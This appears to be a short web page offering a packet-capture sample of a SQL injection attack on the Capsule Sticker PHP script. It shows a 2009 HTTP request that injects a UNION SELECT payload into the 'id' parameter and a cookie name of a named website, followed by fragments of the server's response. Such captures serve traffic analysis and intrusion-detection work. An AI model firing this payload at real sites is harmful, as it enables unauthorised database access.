Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

Download Capsule Sticker SQL Injection PCAP : stickersqli

2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
.. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
Host: www.musicza.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: st1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*=1531fbf68f1f62ccb7b88e9ed77ce518; st1=1531fbf68f1f62ccb7b88e9ed77ce518; st=1531fbf68f1f62ccb7b88e9ed77ce518; PHPSESSID=c1f052c9ac5e264c7b3e29354a9c25cf; _cbclose=1; _cbclose41266=1; _uid41266=7981BF9C.1; _ctout41266=1; verify=test; testcookie=enabled; visit_time=23

2009-01-01 09:30:20.575264 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], ack 820, win 7371, length 0
.. v.,.!E..(..@.4…….u….P.S…..r/.P…(…..
2009-01-01 09:30:20.593702 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], seq 1421:2841, ack 820, win 7371, length 1420: HTTP
.. v…!E…..@.4…….u….P.S…e.r/.P…_…ction MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
function setsmile(what)
{
document.Postcomment.CommentText.value = document.Postcomment.elements.CommentText.value+” “+what;
document.Postcomment.CommentText.focus();
}
function PopupPic(sPicURL) {
window.open( “popup.html?”+sPicURL, “”,
“resizable=1,HEIGHT=200,WIDTH=200”);
}
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//–>

Please follow and like us: